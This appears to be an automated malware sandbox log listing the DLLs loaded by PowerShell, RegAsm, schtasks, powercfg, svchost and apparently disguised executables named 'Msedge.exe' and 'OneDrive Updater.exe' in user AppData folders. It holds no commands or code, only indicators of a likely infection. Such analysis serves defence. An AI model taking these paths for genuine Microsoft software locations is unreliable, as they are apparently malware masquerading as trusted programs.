                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dll
                      Source: C:\Users\user\AppData\Local\Msedge.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Msedge.exeSection loaded: msvcp140.dll
                      Source: C:\Users\user\AppData\Local\Msedge.exeSection loaded: vcruntime140.dll
                      Source: C:\Users\user\AppData\Local\Msedge.exeSection loaded: vcruntime140_1.dll
                      Source: C:\Users\user\AppData\Local\Msedge.exeSection loaded: vcruntime140.dll
                      Source: C:\Users\user\AppData\Local\Msedge.exeSection loaded: vcruntime140_1.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Msedge.exeSection loaded: msvcp140.dll
                      Source: C:\Users\user\AppData\Local\Msedge.exeSection loaded: vcruntime140.dll
                      Source: C:\Users\user\AppData\Local\Msedge.exeSection loaded: vcruntime140_1.dll
                      Source: C:\Users\user\AppData\Local\Msedge.exeSection loaded: vcruntime140.dll
                      Source: C:\Users\user\AppData\Local\Msedge.exeSection loaded: vcruntime140_1.dll
                      Source: C:\Users\user\AppData\Local\Msedge.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Msedge.exeSection loaded: msvcp140.dll
                      Source: C:\Users\user\AppData\Local\Msedge.exeSection loaded: vcruntime140.dll
                      Source: C:\Users\user\AppData\Local\Msedge.exeSection loaded: vcruntime140_1.dll
                      Source: C:\Users\user\AppData\Local\Msedge.exeSection loaded: vcruntime140.dll
                      Source: C:\Users\user\AppData\Local\Msedge.exeSection loaded: vcruntime140_1.dll
                      Source: C:\Users\user\AppData\Local\Msedge.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeSection loaded: apphelp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
